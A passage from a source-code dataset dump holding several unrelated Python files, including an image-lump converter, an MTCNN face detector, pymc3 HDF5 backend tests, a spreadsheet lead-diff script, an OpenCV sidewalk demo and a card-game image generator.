im.frombytes(data)
return im
def from_Image(self, im, translate=False):
"""Load from a PIL Image instance.
If the input image is 24-bit or 32-bit, the colors will be
looked up in the current palette.
If the input image is 8-bit, indices will simply be copied
from the input image. To properly translate colors between
palettes, set the `translate` parameter.
"""
pixels = im.tobytes()
width, height = im.size
xoff, yoff = (width // 2)-1, height-5
if im.mode == "RGB":
pixels = bytes([self.palette.match(unpack('BBB', \
pixels[i*3:(i+1)*3])) for i in range(width*height)])
self.from_raw(pixels, width, height, xoff, yoff, self.palette)
elif im.mode == "RGBA":
pixels = [unpack('BBBB', pixels[i*4:(i+1)*4]) for i in range(width*height)]
pixels = [self.palette.match(i[0:3]) if i[3] > 0 else None for i in pixels]
self.from_pixels(pixels, width, height, xoff, yoff)
elif im.mode == 'P':
srcpal = im.palette.tobytes()
if im.palette.mode == "RGB":
palsize = 3
elif im.palette.mode == "RGBA":
palsize = 4
else:
raise TypeError("palette mode must be 'RGB' or 'RGBA'")
if translate:
R = [c for c in srcpal[0::palsize]]
G = [c for c in srcpal[1::palsize]]
B = [c for c in srcpal[2::palsize]]
srcpal = zip(R, G, B)
lexicon = [self.palette.match(c) for c in srcpal]
pixels = bytes([lexicon[b] for b in pixels])
else:
# Simply copy pixels. However, make sure to translate
# all colors matching the transparency color to the
# right index. This is necessary because programs
# aren't consistent in choice of position for the
# transparent entry.
packed_color = pack("BBB", *self.palette.tran_color)
packed_index = pack("B", self.palette.tran_index)
ri = 0
while ri != -1:
ri = srcpal.find(packed_color, ri+palsize)
if not ri % palsize and ri//palsize != self.palette.tran_index:
pixels = pixels.replace(pack("B", ri//palsize), packed_index)
self.from_raw(pixels, width, height, xoff, yoff, self.palette)
else:
raise TypeError("image mode must be 'P', 'RGB', or 'RGBA'")
def from_file(self, filename, translate=False):
"""Load graphic from an image file."""
if filename[-4:].lower() == '.lmp':
self.data = readfile(filename)
else:
im = Image.open(filename)
self.from_Image(im, translate)
def to_file(self, filename, mode='P'):
"""Save the graphic to an image file.
The output format is selected based on the filename extension.
For example, "file.jpg" saves to JPEG format. If the file has
no extension, PNG format is used.
Special cases: ".lmp" saves the raw lump data, and ".raw" saves
the raw pixel data.
`mode` may be be 'P', 'RGB', or 'RGBA' for palette or 24/32 bit
output, respectively. However, .raw ignores this parameter and
always writes in palette mode.
"""
format = os.path.splitext(filename)[1][1:].upper()
if format == 'LMP': writefile(filename, self.data)
elif format == 'RAW': writefile(filename, self.to_raw())
else:
im = self.to_Image(mode)
if format:
im.save(filename)
else:
im.save(filename, "PNG")
def translate(self, pal):
"""Translate (in-place) the graphic to another palette."""
lexicon = [pal.match(self.palette.colors[i]) for i in range(256)]
lexicon[self.palette.tran_index] = pal.tran_index
if isinstance(self, Flat):
self.data = bytes([lexicon[b] for b in self.data])
else:
raw = self.to_raw()
self.load_raw(bytes([lexicon[b] for b in raw]),
self.width, self.height,
self.x_offset, self.y_offset)
class Flat(Graphic):
"""Subclass of Graphic, for flat graphics."""
def get_dimensions(self):
sz = len(self.data)
if sz == 4096: return (64, 64)
if sz == 4160: return (64, 65)
if sz == 8192: return (64, 128)
root = int(sz**0.5)
if root**2 != sz:
raise TypeError("unable to determine size: not a square number")
return (root, root)
dimensions = property(get_dimensions)
width = property(lambda self: self.dimensions[0])
height = property(lambda self: self.dimensions[1])
def load_raw(self, data, *unused):
self.data = data
def to_raw(self):
return self.data
| 37.995349 | 97 | 0.559718 |
4a1e418b9fc87bf51981b5f409d58091e44be32a | 2,097 | py | Python | Detection/fcn_detector.py | Akira-sxf/mtcnn | 9e9c1a32f2d3374aa1f0287587a2a211c56a40ac | [
"MIT"
] | null | null | null | Detection/fcn_detector.py | Akira-sxf/mtcnn | 9e9c1a32f2d3374aa1f0287587a2a211c56a40ac | [
"MIT"
] | null | null | null | Detection/fcn_detector.py | Akira-sxf/mtcnn | 9e9c1a32f2d3374aa1f0287587a2a211c56a40ac | [
"MIT"
] | null | null | null |
import tensorflow as tf
import sys
sys.path.append("../")
from train_models.MTCNN_config import config
class FcnDetector(object):
#net_factory: which net
#model_path: where the params'file is
def __init__(self, net_factory, model_path):
#create a graph
graph = tf.Graph()
with graph.as_default():
#define tensor and op in graph(-1,1)
self.image_op = tf.placeholder(tf.float32, name='input_image')
self.width_op = tf.placeholder(tf.int32, name='image_width')
self.height_op = tf.placeholder(tf.int32, name='image_height')
image_reshape = tf.reshape(self.image_op, [1, self.height_op, self.width_op, 3])
#self.cls_prob batch*2
#self.bbox_pred batch*4
#construct model here
#self.cls_prob, self.bbox_pred = net_factory(image_reshape, training=False)
#contains landmark
self.cls_prob, self.bbox_pred, _ = net_factory(image_reshape, training=False)
#allow
self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, gpu_options=tf.GPUOptions(allow_growth=True)))
saver = tf.train.Saver()
#check whether the dictionary is valid
model_dict = '/'.join(model_path.split('/')[:-1])
ckpt = tf.train.get_checkpoint_state(model_dict)
print(model_path)
print(ckpt)
readstate = ckpt and ckpt.model_checkpoint_path
assert readstate, "the params dictionary is not valid"
print("restore models' param")
saver.restore(self.sess, model_path)
def predict(self, databatch):
height, width, _ = databatch.shape
# print(height, width)
cls_prob, bbox_pred = self.sess.run([self.cls_prob, self.bbox_pred],
feed_dict={self.image_op: databatch, self.width_op: width,
self.height_op: height})
return cls_prob, bbox_pred
| 45.586957 | 130 | 0.59752 |
4a1e41b0f40965d7ba3dc21b559b4a258e7b277f | 2,754 | py | Python | pymc3/tests/test_hdf5_backend.py | cowirihy/pymc3 | f0b95773047af12f3c0ded04d707f02ddc4d4f6b | [
"Apache-2.0"
] | 3 | 2020-10-06T21:07:30.000Z | 2021-03-04T11:40:17.000Z | pymc3/tests/test_hdf5_backend.py | cowirihy/pymc3 | f0b95773047af12f3c0ded04d707f02ddc4d4f6b | [
"Apache-2.0"
] | null | null | null | pymc3/tests/test_hdf5_backend.py | cowirihy/pymc3 | f0b95773047af12f3c0ded04d707f02ddc4d4f6b | [
"Apache-2.0"
] | 3 | 2019-09-09T13:09:32.000Z | 2021-09-12T14:37:51.000Z | # Copyright 2020 The PyMC Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from pymc3.tests import backend_fixtures as bf
from pymc3.backends import ndarray, hdf5
import os
import tempfile
STATS1 = [{
'a': np.float64,
'b': np.bool
}]
STATS2 = [{
'a': np.float64
}, {
'a': np.float64,
'b': np.int64,
}]
DBNAME = os.path.join(tempfile.gettempdir(), 'test.h5')
class TestHDF50dSampling(bf.SamplingTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = ()
class TestHDF50dSamplingStats1(bf.SamplingTestCase):
backend = hdf5.HDF5
name = DBNAME
sampler_vars = STATS1
shape = ()
class TestHDF50dSamplingStats2(bf.SamplingTestCase):
backend = hdf5.HDF5
name = DBNAME
sampler_vars = STATS2
shape = ()
class TestHDF51dSampling(bf.SamplingTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = 2
class TestHDF52dSampling(bf.SamplingTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = (2, 3)
class TestHDF5Stats(bf.StatsTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = (2, 3)
class TestHDF50dSelection(bf.SelectionTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = ()
skip_test_get_slice_neg_step = True
class TestHDF50dSelectionStats1(bf.SelectionTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = ()
sampler_vars = STATS1
skip_test_get_slice_neg_step = True
class TestHDF50dSelectionStats2(bf.SelectionTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = ()
sampler_vars = STATS2
skip_test_get_slice_neg_step = True
class TestHDF51dSelection(bf.SelectionTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = 2
skip_test_get_slice_neg_step = True
class TestHDF52dSelection(bf.SelectionTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = (2, 3)
skip_test_get_slice_neg_step = True
class TestHDF5DumpLoad(bf.DumpLoadTestCase):
backend = hdf5.HDF5
load_func = staticmethod(hdf5.load)
name = DBNAME
shape = (2, 3)
class TestNDArrayHDF5Equality(bf.BackendEqualityTestCase):
backend0 = ndarray.NDArray
name0 = None
backend1 = hdf5.HDF5
name1 = DBNAME
shape = (2, 3)
| 22.390244 | 76 | 0.696805 |
4a1e42ce0a3a5c616db1c84e9f6010d3aece863f | 936 | py | Python | leads/data.py | leomenezessz/leads-diff | 1b2fb35441f5a8816d825bc839c23fcbd691651f | [
"MIT"
] | null | null | null | leads/data.py | leomenezessz/leads-diff | 1b2fb35441f5a8816d825bc839c23fcbd691651f | [
"MIT"
] | null | null | null | leads/data.py | leomenezessz/leads-diff | 1b2fb35441f5a8816d825bc839c23fcbd691651f | [
"MIT"
] | null | null | null | import pandas
from pandas import Series
pandas.set_option("display.max_rows", None)
def _remove_series_whitespace(series: Series, field: str = "Email"):
return series[field].str.strip()
class DataFormatter:
def __init__(
self, excel_file_path: str, new_leads_sheet: str, old_leads_sheet: str
):
self.excel = pandas.ExcelFile(excel_file_path)
self._new_leads_series = pandas.read_excel(self.excel, new_leads_sheet)
self._old_leads_series = pandas.read_excel(self.excel, old_leads_sheet)
def leads_diff(self):
new_leads_series = _remove_series_whitespace(series=self._new_leads_series)
old_leads_series = _remove_series_whitespace(
series=self._old_leads_series,
)
return (
self._new_leads_series[~new_leads_series.isin(old_leads_series)],
self._old_leads_series[~old_leads_series.isin(new_leads_series)],
)
| 33.428571 | 83 | 0.713675 |
4a1e4335bd62722be9639d891546cf6d85969620 | 2,686 | py | Python | liveSidewalk.py | berkott/NavigationAssistant | 1363bface88c1d7e0734cfed67646dbc11ebc90c | [
"MIT"
] | 1 | 2019-12-09T23:20:24.000Z | 2019-12-09T23:20:24.000Z | liveSidewalk.py | berkott/NavigationAssistant | 1363bface88c1d7e0734cfed67646dbc11ebc90c | [
"MIT"
] | null | null | null | liveSidewalk.py | berkott/NavigationAssistant | 1363bface88c1d7e0734cfed67646dbc11ebc90c | [
"MIT"
] | 2 | 2021-04-03T13:52:07.000Z | 2021-04-04T11:58:16.000Z | import sys
import cv2
import numpy as np
sys.path.append("..")
from learningModels import vgg
sys.path.remove("..")
def warpImage(img):
dst_size = (960, 720)
src = np.float32([(200, 300), (760, 300), (0, 720), (960, 720)])
dst = np.float32([(0, 0), (960, 0), (0, 720), (960, 720)])
M = cv2.getPerspectiveTransform(src, dst)
return cv2.warpPerspective(img, M, dst_size)
# def inverseWarpImage(img):
# dst_size = (960, 720)
# src = np.float32([(200, 300), (760, 300), (0, 720), (960, 720)])
# dst = np.float32([(0, 0), (960, 0), (0, 720), (960, 720)])
# M = cv2.getPerspectiveTransform(dst, src)
#
# return cv2.warpPerspective(img, M, dst_size)
def get_lined_image(img, lines, color):
for i in range(2):
a = np.cos(lines[1 + (i*2)])
b = np.sin(lines[1 + (i*2)])
x0 = a * lines[i*2]
y0 = b * lines[i*2]
x1 = int(x0 + 1000 * (-b))
y1 = int(y0 + 1000 * a)
x2 = int(x0 - 1000 * (-b))
y2 = int(y0 - 1000 * a)
cv2.line(img, (x1, y1), (x2, y2), color, 2)
return img
def reverse_transform(lines):
lines[1] *= (2 * np.pi)
lines[3] *= (2 * np.pi)
if lines[1] > np.pi / 2:
lines[0] *= -760
else:
lines[0] *= 760
if lines[3] > np.pi/2:
lines[2] *= -760
else:
lines[2] *= 760
return lines
def live_video_main():
cap = cv2.VideoCapture('data/video1.mkv')
model = vgg.vgg(0, 0)
# model.load("1574810490")
# model.load("1580713365")
model.load('1580713366')
while True:
ret, frame = cap.read()
cv2.imshow("frame", frame)
orig_img = frame.copy()
# warped = warpImage(frame)
# cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cv2.imshow("smaller", cv2.resize(warpImage(frame), (40, 30), interpolation=cv2.INTER_AREA))
downscaled_frame = np.divide(cv2.resize(cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY), (120, 90),
interpolation=cv2.INTER_AREA), 255).reshape((90, 120, 1))
x_mod = [downscaled_frame]
prediction = model.predict(np.asarray(x_mod))
# prediction = model.predict(downscaled_frame)
transformed_prediction = reverse_transform(prediction[0])
print("Prediction:", transformed_prediction)
prediction_img = get_lined_image(orig_img, transformed_prediction, (0, 0, 255))
cv2.imshow('Result', prediction_img)
k = cv2.waitKey(50)
if k == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
live_video_main() | 26.333333 | 105 | 0.567759 |
4a1e4395a11f9d40dad6331a50e5d6a499575617 | 27,580 | py | Python | TSSSF_CardGen.py | BitokuOokami/CardMachine | d927b062ca96af1313ec94de70053a1e069c20d0 | [
"MIT"
] | null | null | null | TSSSF_CardGen.py | BitokuOokami/CardMachine | d927b062ca96af1313ec94de70053a1e069c20d0 | [
"MIT"
] | 3 | 2016-01-12T01:42:31.000Z | 2016-03-28T23:31:53.000Z | TSSSF_CardGen.py | BitokuOokami/CardMachine | d927b062ca96af1313ec94de70053a1e069c20d0 | [
"MIT"
] | 4 | 2015-12-27T01:48:34.000Z | 2019-10-19T03:42:51.000Z | import os, glob, shutil, traceback, random
import PIL_Helper
TYPE, PICTURE, SYMBOLS, TITLE, KEYWORDS, BODY, FLAVOR, EXPANSION, CLIENT = range(9)
DIRECTORY = "TSSSF"
ARTIST = "Pixel Prism"
Expansion_Icon = None
LegacySymbolMode = False
PAGE_WIDTH = 3
PAGE_HEIGHT = 3
TOTAL_CARDS = PAGE_WIDTH * PAGE_HEIGHT
workspace_path = os.path.dirname("workspace")
card_set = os.path.dirname("deck.cards")
CardSet = os.path.dirname("deck.cards")
CardPath = DIRECTORY + "/Card Art/"
ResourcePath = DIRECTORY + "/resources/"
BleedsPath = DIRECTORY + "/bleed-images/"
CropPath = DIRECTORY + "/cropped-images/"
VassalPath = DIRECTORY + "/vassal-images/"
BleedTemplatesPath = ResourcePath + "/bleed templates/"
SymbolsPath = ResourcePath + "/symbols/"
ExpansionIconsPath = ResourcePath + "/expansion icons/"
CardBacksPath = ResourcePath + "/card backs/"
FontsPath = ResourcePath + "/fonts/"
VassalTemplatesPath = DIRECTORY + "/vassal templates/"
VassalWorkspacePath = DIRECTORY + "/vassal workspace/"
VassalImagesPath = os.path.join(VassalWorkspacePath, "images")
VASSAL_SCALE = (260, 359)
VassalCard = [0]
ART_WIDTH = 600
base_w = 889
base_h = 1215
base_w_center = base_w / 2
base_h_center = base_h / 2
w_marg = 31
h_marg = 36
baserect = [(w_marg, h_marg), (base_w - w_marg, base_h - h_marg)]
textmaxwidth = 689
croprect = (50, 63, 788 + 50, 1088 + 63)
TextHeightThresholds = [363, 378, 600]
TitleWidthThresholds = [50] # This is in #characters, fix later plox
BarTextThreshold = [500]
fonts = {
"Title": PIL_Helper.BuildFont(FontsPath + "TSSSFBartholomew-Bold.otf", 55),
"TitleSmall": PIL_Helper.BuildFont(FontsPath + "TSSSFBartholomew-Bold.otf", 45),
"Body": PIL_Helper.BuildFont(FontsPath + "TSSSFCabin-Medium.ttf", 35),
"BodySmall": PIL_Helper.BuildFont(FontsPath + "TSSSFCabin-Medium.ttf", 35),
"BodyChangeling": PIL_Helper.BuildFont(FontsPath + "TSSSFCabin-Medium.ttf", 31),
"Bar": PIL_Helper.BuildFont(FontsPath + "TSSSFCabin-Medium.ttf", 38),
"BarSmall": PIL_Helper.BuildFont(FontsPath + "TSSSFCabin-Medium.ttf", 35),
"Flavortext": PIL_Helper.BuildFont(FontsPath + "KlinicSlabBookIt.otf", 28),
"Copyright": PIL_Helper.BuildFont(FontsPath + "TSSSFCabin-Medium.ttf", 18)
}
Anchors = {
"Blank": (base_w_center, 300),
"PonyArt": (173, 225),
"ShipArt": (173, 226),
"GoalArt": (174, 224),
"Symbol1": (58 + 50, 56 + 63),
"Symbol2": (58 + 50, 160 + 63),
"LoneSymbol": (108, 153),
"TimelineSymbol": (58 + 50, 535 + 63),
"GoalSymbol2": (108, 613),
"Title": (-65 - 50, 160),
"TitleTwoLine": (-65 - 50, 159),
"TitleSmall": (-65 - 50, 157),
"Bar": (-68 - 50, 598 + 67),
"Body": (base_w_center, 735),
"BodyShiftedUp": (base_w_center, 730),
"Flavor": (base_w_center, -110),
"Expansion": (640 + 50, 525 + 63),
"Copyright": (-38 - 50, -13 - 61)
}
ArtMissing = [
PIL_Helper.LoadImage(CardPath + "artmissing01.png"),
PIL_Helper.LoadImage(CardPath + "artmissing02.png"),
PIL_Helper.LoadImage(CardPath + "artmissing03.png"),
PIL_Helper.LoadImage(CardPath + "artmissing04.png"),
PIL_Helper.LoadImage(CardPath + "artmissing05.png"),
PIL_Helper.LoadImage(CardPath + "artmissing06.png"),
PIL_Helper.LoadImage(CardPath + "artmissing07.png"),
]
Frames = {
"START": PIL_Helper.LoadImage(BleedTemplatesPath + "BLEED-Blank-Start-bleed.png"),
"Warning": PIL_Helper.LoadImage(CardPath + "BLEED_Card - Warning.png"),
"Pony": PIL_Helper.LoadImage(BleedTemplatesPath + "BLEED-Blank-Pony-bleed.png"),
"Ship": PIL_Helper.LoadImage(BleedTemplatesPath + "BLEED-Blank-Ship-bleed.png"),
"Rules1": PIL_Helper.LoadImage(CardPath + "BLEED_Rules1.png"),
"Rules3": PIL_Helper.LoadImage(CardPath + "BLEED_Rules3.png"),
"Rules5": PIL_Helper.LoadImage(CardPath + "BLEED_Rules5.png"),
"Goal": PIL_Helper.LoadImage(BleedTemplatesPath + "BLEED-Blank-Goal-bleed.png"),
"Derpy": PIL_Helper.LoadImage(CardPath + "BLEED_Card - Derpy Hooves.png"),
"TestSubject": PIL_Helper.LoadImage(CardPath + "BLEED_Card - OverlayTest Subject Cheerilee.png")
}
Symbols = {
"male": PIL_Helper.LoadImage(SymbolsPath + "Symbol-male.png"),
"female": PIL_Helper.LoadImage(SymbolsPath + "Symbol-Female.png"),
"malefemale": PIL_Helper.LoadImage(SymbolsPath + "Symbol-MaleFemale.png"),
"earth pony": PIL_Helper.LoadImage(SymbolsPath + "Symbol-Earth-Pony.png"),
"unicorn": PIL_Helper.LoadImage(SymbolsPath + "Symbol-Unicorn.png"),
"uniearth": PIL_Helper.LoadImage(SymbolsPath + "symbol-uniearth.png"),
"pegasus": PIL_Helper.LoadImage(SymbolsPath + "Symbol-Pegasus.png"),
"alicorn": PIL_Helper.LoadImage(SymbolsPath + "Symbol-Alicorn.png"),
"changelingearthpony": PIL_Helper.LoadImage(SymbolsPath + "Symbol-ChangelingEarthPony.png"),
"changelingunicorn": PIL_Helper.LoadImage(SymbolsPath + "Symbol-ChangelingUnicorn.png"),
"changelingpegasus": PIL_Helper.LoadImage(SymbolsPath + "Symbol-ChangelingPegasus.png"),
"changelingalicorn": PIL_Helper.LoadImage(SymbolsPath + "Symbol-ChangelingAlicorn.png"),
"dystopian": PIL_Helper.LoadImage(SymbolsPath + "symbol-dystopian-future.png"),
"ship": PIL_Helper.LoadImage(SymbolsPath + "Symbol-Ship.png"),
"goal": PIL_Helper.LoadImage(SymbolsPath + "Symbol-Goal.png"),
"0": PIL_Helper.LoadImage(SymbolsPath + "symbol-0.png"),
"1": PIL_Helper.LoadImage(SymbolsPath + "symbol-1.png"),
"2": PIL_Helper.LoadImage(SymbolsPath + "symbol-2.png"),
"3": PIL_Helper.LoadImage(SymbolsPath + "symbol-3.png"),
"4": PIL_Helper.LoadImage(SymbolsPath + "symbol-4.png"),
"3-4": PIL_Helper.LoadImage(SymbolsPath + "symbol-34.png"),
"2-3": PIL_Helper.LoadImage(SymbolsPath + "symbol-23.png")
}
TIMELINE_SYMBOL_LIST = ["Dystopian"]
Expansions = {
"Everfree14": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-Everfree14.png"),
"Indiegogo": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-Indiegogo.png"),
"Birthday": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-birthday.png"),
"Bronycon": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-Bronycon14.png"),
"Summer": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-summer-lovin.png"),
"Apricity": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-apricity.png"),
"BronyCAN": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-Bronycan14.png"),
"Xtra": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-extracredit.png"),
"Xtra-dark": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-extracredit-black.png"),
"NMND": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-nightmarenights.png"),
"Ciderfest": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-ponyvilleciderfest.png"),
"Adventure": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-adventure.png"),
"Custom": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-custom.png"),
"Power": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-power.png"),
"Multiplicity": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-multiplicity.png"),
"Canon": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-canon.png"),
"Dungeon": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-dungeon.png"),
"50": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-50.png"),
"2014": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-2014.png"),
"Hearthswarming": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-hearthswarming.png"),
"Ponycon 2015": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-ponynyc.png"),
"Patreon": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-Patreon.png"),
"Gameshow": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-gameshow.png"),
"BABScon": PIL_Helper.LoadImage(ExpansionIconsPath + "symbol-BABScon.png")
}
ColorDict = {
"START": (58, 50, 53),
"START bar text": (237, 239, 239),
"START flavor": (28, 20, 23),
"Pony": (70, 44, 137),
"Pony bar text": (234, 220, 236),
"Pony flavor": (25, 2, 51),
"Goal": (18, 57, 98),
"Goal flavor": (7, 34, 62),
"Shipwrecker": (8, 57, 98),
"Shipwrecker flavor": (0, 34, 62),
"Ship": (206, 27, 105),
"Ship bar text": (234, 220, 236),
"Ship flavor": (137, 22, 47),
"Copyright": (255, 255, 255),
"Blankfill": (200, 200, 200)
}
RulesDict = {
"{replace}": "While this card is in your hand, you may discard a Pony card from the grid and play this card in its place. This power cannot be copied.",
"{swap}": "You may swap 2 Pony cards on the shipping grid.",
"{3swap}": "You may swap up to 3 Pony cards on the grid.",
"{draw}": "You may draw 1 card from the Ship or Pony deck.",
"{goal}": "You may discard 1 active Goal and draw 1 new Goal to replace it.",
"{search}": "You may search the Ship or Pony discard pile for 1 card of your choice and put it into your hand. If it's still in your hand at the end of your turn, discard it.",
"{copy}": "You may copy the power of any Pony card currently on the shipping grid, except for Pony cards with the Changeling keyword.",
"{hermaphrodite}": "May count as either {male} or {female} for all Goals, Ships, and powers.",
"{double pony}": "This card counts as 2 Ponies.",
"{love poison}": "Instead of playing this Ship with a Pony card from your hand, or connecting two Pony cards already on the shipping grid, you may take a Pony card from the grid and reattach it elsewhere with this Ship. That card's power activates.",
"{keyword change}": "When you attach this card to the grid, you may choose one Pony card attached to this Ship. Until the end of your turn, that Pony card gains one keyword of your choice, except for Pony names.",
"{gender change}": "When you attach this card to the grid, you may choose one Pony card attached to this Ship. Until the end of your turn, that Pony card becomes the opposite gender.",
"{race change}": "When you attach this card to the grid, you may choose one Pony card attached to this Ship. Until the end of your turn, that Pony card becomes the race of your choice. This cannot affect Pony cards with the Changeling keyword.",
"{timeline change}": "When you attach this card to the grid, you may choose one Pony card attached to this Ship. Until the end of your turn, that Pony card's timeline becomes {postapocalypse}.",
"{play from discard}": "You may choose to play the top card of the Pony discard pile with this Ship, rather than play a Pony card from your hand.",
"{clone}": "When you attach this card to the grid, you may choose one Pony card attached to this Ship. Until the end of your turn, that Pony card counts as 2 Ponies.",
}
backs = {
"START": PIL_Helper.LoadImage(CardBacksPath + "Back-Start.png"),
"Pony": PIL_Helper.LoadImage(CardBacksPath + "Back-Main.png"),
"Goal": PIL_Helper.LoadImage(CardBacksPath + "Back-Goals.png"),
"Ship": PIL_Helper.LoadImage(CardBacksPath + "Back-Ships.png"),
"Card": PIL_Helper.LoadImage(CardBacksPath + "Back-Main.png"),
"Shipwrecker": PIL_Helper.LoadImage(CardBacksPath + "Back-Main.png"),
"BLANK": PIL_Helper.LoadImage(CardBacksPath + "Blank - Intentionally Left Blank.png"),
"Rules1": PIL_Helper.LoadImage(CardPath + "Rules2.png"),
"Rules3": PIL_Helper.LoadImage(CardPath + "Rules4.png"),
"Rules5": PIL_Helper.LoadImage(CardPath + "Rules6.png"),
"TestSubject": PIL_Helper.LoadImage(CardBacksPath + "Back-Main.png"),
"Warning": PIL_Helper.LoadImage(CardPath + "Card - Contact.png")
}
special_card_types = ["Rules1", "Rules3", "Rules5", "Warning", "Derpy", "Card"]
special_cards_with_copyright = ["Derpy"]
def FixFileName(tagin):
FileName = tagin.replace("\n", "")
invalid_chars = [",", "?", '"', ":"]
for c in invalid_chars:
FileName = FileName.replace(c, "")
FileName = u"{0}.png".format(FileName)
return FileName
def FixUnicode(text):
text = text.replace(r'\n', '\n')
if LegacySymbolMode:
text = text.replace(';', u"\u2642")
text = text.replace('*', u"\u2640")
text = text.replace('>', u"\u26A4")
text = text.replace('<', u"\u2764")
text = text.replace('%', u"\uE000")
text = text.replace('8', u"\uE001")
text = text.replace('9', u"\uE002")
text = text.replace('@', u"\uE003")
text = text.replace('$', u"\uE004")
else:
text = text.replace('{male}', u"\u2642")
text = text.replace('{female}', u"\u2640")
text = text.replace('{malefemale}', u"\u26A4")
text = text.replace('{ship}', u"\u2764")
text = text.replace('{earthpony}', u"\uE000")
text = text.replace('{unicorn}', u"\uE001")
text = text.replace('{pegasus}', u"\uE002")
text = text.replace('{alicorn}', u"\uE003")
text = text.replace('{postapocalypse}', u"\uE004")
return text
def SaveCard(filepath, image_to_save):
'''
If the filepath already exists, insert _001 just before the
extension. If that exists, increment the number until we get to
a filepath that doesn't exist yet.
'''
if os.path.exists(filepath):
basepath, extension = os.path.splitext(filepath)
i = 0
while os.path.exists(filepath):
i += 1
filepath = "{}_{:>03}{}".format(basepath, i, extension)
image_to_save.save(filepath, dpi=(300, 300))
def BuildCard(data):
picture = None
title = None
if type(data).__name__ == 'dict':
card = data
card_type = data['type']
picture = data.get('picture', None)
title = data.get('title', None)
else:
card = data.strip('\n').strip('\r').replace(r'\n', '\n').split('`')
card_type = card[TYPE]
if len(card) >= 2:
picture = card[PICTURE]
if len(card) > 2:
title = card[TITLE]
try:
im = PickCardFunc(card_type, card)
if picture is not None:
if title is not None:
filename = FixFileName(card_type + "_" + title)
else:
filename = FixFileName(card_type + "_" + picture)
SaveCard(os.path.join(BleedsPath, filename), im)
im_crop = im.crop(croprect)
SaveCard(os.path.join(CropPath, filename), im_crop)
im_vassal = PIL_Helper.ResizeImage(im_crop, VASSAL_SCALE)
SaveCard(os.path.join(VassalPath, filename), im_vassal)
else:
im_crop = im.crop(croprect)
except Exception as e:
print "Warning, Bad Card: {0}".format(data)
traceback.print_exc()
im_crop = MakeBlankCard().crop(croprect)
return im_crop
def BuildBack(data):
if type(data).__name__ == 'dict':
card_type = data['type']
else:
card = data.strip('\n').strip('\r').replace(r'\n', '\n').split('`')
card_type = card[TYPE]
return backs[card_type]
def PickCardFunc(card_type, data):
if card_type == "START":
return MakeStartCard(data)
elif card_type == "Pony":
return MakePonyCard(data)
elif card_type == "Ship":
return MakeShipCard(data)
elif card_type == "Goal":
return MakeGoalCard(data)
elif card_type == "BLANK":
return MakeBlankCard()
elif card_type == "TestSubject":
return MakePonyCard(data)
elif card_type in special_card_types:
return MakeSpecialCard(data)
else:
raise Exception("No card of type {0}".format(card_type))
def GetFrame(card_type):
return Frames[card_type].copy()
def AddCardArt(image, filename, anchor):
if filename == "NOART":
return
if os.path.exists(os.path.join(CardPath, filename)):
art = PIL_Helper.LoadImage(os.path.join(CardPath, filename))
else:
art = random.choice(ArtMissing)
# Find desired height of image based on width of 600 px
w, h = art.size
h = int((float(ART_WIDTH) / w) * h)
# Resize image to fit in frame
art = PIL_Helper.ResizeImage(art, (ART_WIDTH, h))
image.paste(art, anchor)
def AddSymbols(image, symbols, card_type=""):
# Remove any timeline symbols from the symbols list
pruned_symbols = set(symbols) - set(TIMELINE_SYMBOL_LIST)
if card_type == "Goal":
positions = [Anchors["LoneSymbol"], Anchors["GoalSymbol2"]]
else:
# If there's only one non-timeline symbol in the list,
# Set it right on the corner of the picture.
# Otherwise, adjust so the symbols share the space
if len(pruned_symbols) == 1:
positions = [Anchors["LoneSymbol"]]
else:
positions = [Anchors["Symbol1"], Anchors["Symbol2"]]
for index, s in enumerate(symbols):
sym = Symbols.get(s.lower(), None)
if sym:
if s in TIMELINE_SYMBOL_LIST:
image.paste(sym, Anchors["TimelineSymbol"], sym)
else:
image.paste(sym, positions[index], sym)
def TitleText(image, text, color):
font = fonts["Title"]
anchor = Anchors["Title"]
leading = -9
if text.count('\n') > 0:
anchor = Anchors["TitleTwoLine"]
leading = -15
if len(text) > TitleWidthThresholds[0]:
anchor = Anchors["TitleSmall"]
font = fonts["TitleSmall"]
print repr(text)
PIL_Helper.AddText(
image=image,
text=text,
font=font,
fill=color,
anchor=anchor,
valign="center",
halign="right",
leading_offset=leading
)
